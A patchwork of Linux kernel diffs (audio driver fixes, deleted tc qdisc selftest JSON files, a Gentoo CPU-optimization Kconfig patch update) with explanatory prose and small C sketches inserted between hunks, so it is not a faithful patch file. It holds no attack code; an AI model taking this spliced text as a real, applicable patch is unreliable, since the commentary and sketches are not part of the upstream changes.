+ 	INIT_LIST_HEAD(&dsp->compr_list);
+ 	INIT_LIST_HEAD(&dsp->buffer_list);
+ 
+-	if (!dsp->fwf_name) {
+-		p = devm_kstrdup(dsp->cs_dsp.dev, dsp->cs_dsp.name, GFP_KERNEL);
+-		if (!p)
+-			return -ENOMEM;
+-
+-		dsp->fwf_name = p;
+-		for (; *p != 0; ++p)
+-			*p = tolower(*p);
+-	}
+-
+ 	return 0;
+ }
+ 
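
The wm_adsp change drops the init-time devm_kstrdup() of a default firmware-file name in favour of picking the fallback at each point of use, so a NULL fwf_name simply means "use the DSP core name" and there is no allocation to fail or free. The pattern in a trivial sketch (hypothetical names):

    #include <stdio.h>

    struct dsp {
        const char *fwf_name;   /* optional override, may be NULL */
        const char *core_name;  /* always present */
    };

    /* Resolve the name where it is needed instead of materialising a
     * duplicate string at init time; no allocation, no cleanup path.
     */
    static const char *dsp_fwf_name(const struct dsp *dsp)
    {
        return dsp->fwf_name ? dsp->fwf_name : dsp->core_name;
    }

    int main(void)
    {
        struct dsp a = { .fwf_name = NULL, .core_name = "cs_dsp0" };
        struct dsp b = { .fwf_name = "custom", .core_name = "cs_dsp0" };

        printf("%s %s\n", dsp_fwf_name(&a), dsp_fwf_name(&b));
        return 0;
    }
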
+diff --git a/sound/soc/sunxi/sun4i-spdif.c b/sound/soc/sunxi/sun4i-spdif.c
+index bcceebca915ac..484b0e7c2defa 100644
+--- a/sound/soc/sunxi/sun4i-spdif.c
++++ b/sound/soc/sunxi/sun4i-spdif.c
+@@ -578,6 +578,11 @@ static const struct of_device_id sun4i_spdif_of_match[] = {
+ 		.compatible = "allwinner,sun50i-h6-spdif",
+ 		.data = &sun50i_h6_spdif_quirks,
+ 	},
++	{
++		.compatible = "allwinner,sun50i-h616-spdif",
++		/* Essentially the same as the H6, but without RX */
++		.data = &sun50i_h6_spdif_quirks,
++	},
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, sun4i_spdif_of_match);
+diff --git a/sound/usb/clock.c b/sound/usb/clock.c
+index 33db334e65566..a676ad093d189 100644
+--- a/sound/usb/clock.c
++++ b/sound/usb/clock.c
+@@ -328,8 +328,16 @@ static int __uac_clock_find_source(struct snd_usb_audio *chip,
+ 			if (chip->quirk_flags & QUIRK_FLAG_SKIP_CLOCK_SELECTOR)
+ 				return ret;
+ 			err = uac_clock_selector_set_val(chip, entity_id, cur);
+-			if (err < 0)
++			if (err < 0) {
++				if (pins == 1) {
++					usb_audio_dbg(chip,
++						      "%s(): selector returned an error, "
++						      "assuming a firmware bug, id %d, ret %d\n",
++						      __func__, clock_id, err);
++					return ret;
++				}
+ 				return err;
++			}
+ 		}
+ 
+ 		if (!validate || ret > 0 || !chip->autoclock)
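
The clock.c quirk tolerates a failed write to a clock selector that has a single input: with one pin there is nothing to choose, so the error carries no information and the previously read value can be kept. The shape of that error handling, reduced to a sketch (hypothetical names):

    #include <stdio.h>

    static int fail_set(int val)
    {
        (void)val;
        return -5;    /* firmware rejects the write */
    }

    /* A failed write to a single-input selector is harmless: keep the
     * value we already read instead of aborting, mirroring the quirk
     * handling added above.
     */
    static int select_pin(int pins, int cur, int (*set)(int))
    {
        int err = set(cur);

        if (err < 0 && pins != 1)
            return err;    /* a real selector, propagate the error */
        return cur;        /* single input: nothing to choose anyway */
    }

    int main(void)
    {
        printf("%d\n", select_pin(1, 1, fail_set));    /* 1: tolerated */
        printf("%d\n", select_pin(2, 1, fail_set));    /* -5: real error */
        return 0;
    }
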
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index ab5fed9f55b60..3b45d0ee76938 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -470,9 +470,11 @@ static int validate_sample_rate_table_v2v3(struct snd_usb_audio *chip,
+ 					   int clock)
+ {
+ 	struct usb_device *dev = chip->dev;
++	struct usb_host_interface *alts;
+ 	unsigned int *table;
+ 	unsigned int nr_rates;
+ 	int i, err;
++	u32 bmControls;
+ 
+ 	/* performing the rate verification may lead to unexpected USB bus
+ 	 * behavior afterwards by some unknown reason.  Do this only for the
+@@ -481,6 +483,24 @@ static int validate_sample_rate_table_v2v3(struct snd_usb_audio *chip,
+ 	if (!(chip->quirk_flags & QUIRK_FLAG_VALIDATE_RATES))
+ 		return 0; /* don't perform the validation as default */
+ 
++	alts = snd_usb_get_host_interface(chip, fp->iface, fp->altsetting);
++	if (!alts)
++		return 0;
++
++	if (fp->protocol == UAC_VERSION_3) {
++		struct uac3_as_header_descriptor *as = snd_usb_find_csint_desc(
++				alts->extra, alts->extralen, NULL, UAC_AS_GENERAL);
++		bmControls = le32_to_cpu(as->bmControls);
++	} else {
++		struct uac2_as_header_descriptor *as = snd_usb_find_csint_desc(
++				alts->extra, alts->extralen, NULL, UAC_AS_GENERAL);
++		bmControls = as->bmControls;
++	}
++
++	if (!uac_v2v3_control_is_readable(bmControls,
++				UAC2_AS_VAL_ALT_SETTINGS))
++		return 0;
++
+ 	table = kcalloc(fp->nr_rates, sizeof(*table), GFP_KERNEL);
+ 	if (!table)
+ 		return -ENOMEM;
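
The format.c change gates the rate-table validation quirk on the interface descriptor actually advertising a readable "valid alternate settings" control. In UAC2/UAC3, bmControls packs two bits per control, and the low bit of each pair means readable; a sketch of that decoding, as I read the spec (hypothetical names):

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    /* UAC2/UAC3-style control bitmap: control N (1-based) occupies
     * bits [2N-2, 2N-1]; the low bit of the pair means "readable".
     */
    static bool control_is_readable(uint32_t bm_controls, unsigned int control)
    {
        return (bm_controls >> ((control - 1) * 2)) & 0x1;
    }

    int main(void)
    {
        uint32_t bm = 0x05;    /* controls 1 and 2 readable, not writable */

        printf("%d %d %d\n",
               control_is_readable(bm, 1),
               control_is_readable(bm, 2),
               control_is_readable(bm, 3));
        return 0;
    }
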
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/atm.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/atm.json
+deleted file mode 100644
+index f5bc8670a67d1..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/atm.json
++++ /dev/null
+@@ -1,94 +0,0 @@
+-[
+-    {
+-        "id": "7628",
+-        "name": "Create ATM with default setting",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root atm",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc atm 1: root refcnt",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "390a",
+-        "name": "Delete ATM with valid handle",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true",
+-            "$TC qdisc add dev $DUMMY handle 1: root atm"
+-        ],
+-        "cmdUnderTest": "$TC qdisc del dev $DUMMY handle 1: root",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc atm 1: root refcnt",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "32a0",
+-        "name": "Show ATM class",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root atm",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC class show dev $DUMMY",
+-        "matchPattern": "class atm 1: parent 1:",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "6310",
+-        "name": "Dump ATM stats",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root atm",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC -s qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc atm 1: root refcnt",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    }
+-]
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/cbq.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/cbq.json
+deleted file mode 100644
+index 1ab21c83a1223..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/cbq.json
++++ /dev/null
+@@ -1,184 +0,0 @@
+-[
+-    {
+-        "id": "3460",
+-        "name": "Create CBQ with default setting",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "0592",
+-        "name": "Create CBQ with mpu",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 mpu 1000",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4684",
+-        "name": "Create CBQ with valid cell num",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 cell 128",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4345",
+-        "name": "Create CBQ with invalid cell num",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 cell 100",
+-        "expExitCode": "1",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4525",
+-        "name": "Create CBQ with valid ewma",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 ewma 16",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "6784",
+-        "name": "Create CBQ with invalid ewma",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 ewma 128",
+-        "expExitCode": "1",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "5468",
+-        "name": "Delete CBQ with handle",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true",
+-            "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000"
+-        ],
+-        "cmdUnderTest": "$TC qdisc del dev $DUMMY handle 1: root",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "492a",
+-        "name": "Show CBQ class",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC class show dev $DUMMY",
+-        "matchPattern": "class cbq 1: root rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    }
+-]
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/dsmark.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/dsmark.json
+deleted file mode 100644
+index c030795f9c37d..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/dsmark.json
++++ /dev/null
+@@ -1,140 +0,0 @@
+-[
+-    {
+-        "id": "6345",
+-        "name": "Create DSMARK with default setting",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "3462",
+-        "name": "Create DSMARK with default_index setting",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 default_index 512",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400 default_index 0x0200",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "ca95",
+-        "name": "Create DSMARK with set_tc_index flag",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 set_tc_index",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400 set_tc_index",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "a950",
+-        "name": "Create DSMARK with multiple setting",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 default_index 1024 set_tc_index",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400 default_index 0x0400 set_tc_index",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4092",
+-        "name": "Delete DSMARK with handle",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true",
+-            "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 default_index 1024"
+-        ],
+-        "cmdUnderTest": "$TC qdisc del dev $DUMMY handle 1: root",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "5930",
+-        "name": "Show DSMARK class",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC class show dev $DUMMY",
+-        "matchPattern": "class dsmark 1:",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    }
+-]
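
The deleted cases above all encode the same tdc contract: run "setup",
execute "cmdUnderTest" and compare its status with "expExitCode", then
run "verifyCmd" and require that the number of output lines matching
"matchPattern" equals "matchCount", before "teardown" cleans up. A
minimal C sketch of that verify step (a standalone illustration, not
tdc itself; tdc applies Python regexes where a plain substring is used
here, and "dev lo" is only a stand-in device):

  #include <stdio.h>
  #include <string.h>

  /* Count the lines of a verify command's output containing pattern. */
  static int match_count(const char *verify_cmd, const char *pattern)
  {
          char line[512];
          int count = 0;
          FILE *p = popen(verify_cmd, "r");   /* POSIX popen(3) */

          if (!p)
                  return -1;
          while (fgets(line, sizeof(line), p))
                  if (strstr(line, pattern))  /* substring, not a regex */
                          count++;
          pclose(p);
          return count;
  }

  int main(void)
  {
          /* As with "matchCount": "1" above: expect one matching line. */
          int n = match_count("tc qdisc show dev lo", "qdisc");

          printf("matches: %d\n", n);
          return n == 1 ? 0 : 1;
  }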


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-23 13:19 Mike Pagano
From: Mike Pagano @ 2024-02-23 13:19 UTC
  To: gentoo-commits

commit:     ff81d2160a223fce45984c504cd886e7fdde438a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 23 13:19:36 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Feb 23 13:19:36 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ff81d216

Update cpu opt patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 71 ++++++++++++++-------------
 1 file changed, 36 insertions(+), 35 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index 7a1b717a..596cade6 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,6 +1,6 @@
-From 70d4906b87983ed2ed5da78930a701625d881dd0 Mon Sep 17 00:00:00 2001
+From 71dd30c3e2ab2852b0290ae1f34ce1c7f8655040 Mon Sep 17 00:00:00 2001
 From: graysky <therealgraysky@proton.me>
-Date: Thu, 5 Jan 2023 14:29:37 -0500
+Date: Wed, 21 Feb 2024 08:38:13 -0500
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -13,9 +13,10 @@ offered which are good for supported Intel or AMD CPUs:
 • x86-64-v3
 • x86-64-v4
 
-Users of glibc 2.33 and above can see which level is supported by current
-hardware by running:
+Users of glibc 2.33 and above can see which level is supported by running:
   /lib/ld-linux-x86-64.so.2 --help | grep supported
+Or
+  /lib64/ld-linux-x86-64.so.2 --help | grep supported
 
 Alternatively, compare the flags from /proc/cpuinfo to this list.[1]
 
@@ -106,12 +107,12 @@ REFERENCES
  3 files changed, 528 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..f589971df2d3 100644
+index 87396575c..5ac6e8463 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
- 
- 
+
+
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -120,7 +121,7 @@ index 542377cd419d..f589971df2d3 100644
  	  Select this for an AMD K6-family processor.  Enables use of
 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
- 
+
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
@@ -129,7 +130,7 @@ index 542377cd419d..f589971df2d3 100644
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
 @@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
- 
+
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -137,7 +138,7 @@ index 542377cd419d..f589971df2d3 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
- 
+
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -237,17 +238,17 @@ index 542377cd419d..f589971df2d3 100644
  	depends on X86_32
 @@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
- 
+
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
- 
+
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
 @@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
- 
+
 +	  Enables -march=core2
 +
  config MATOM
@@ -256,7 +257,7 @@ index 542377cd419d..f589971df2d3 100644
 @@ -287,6 +383,212 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
- 
+
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -469,7 +470,7 @@ index 542377cd419d..f589971df2d3 100644
 @@ -294,6 +596,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
- 
+
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -515,7 +516,7 @@ index 542377cd419d..f589971df2d3 100644
 +	  Enables -march=native
 +
  endchoice
- 
+
  config X86_GENERIC
 @@ -318,9 +664,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
@@ -534,17 +535,17 @@ index 542377cd419d..f589971df2d3 100644
 -	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
 +	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
 +	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
- 
+
  config X86_F00F_BUG
  	def_bool y
 @@ -332,15 +686,27 @@ config X86_INVD_BUG
- 
+
  config X86_ALIGNMENT_16
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
 +	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
 +	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
- 
+
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
@@ -553,7 +554,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
 +	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL
- 
+
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
@@ -565,7 +566,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
 +	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
 +	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
- 
+
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
 @@ -356,32 +722,63 @@ config X86_USE_PPRO_CHECKSUM
@@ -578,7 +579,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
 +	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
 +	|| MNATIVE_INTEL)
- 
+
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
@@ -590,7 +591,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
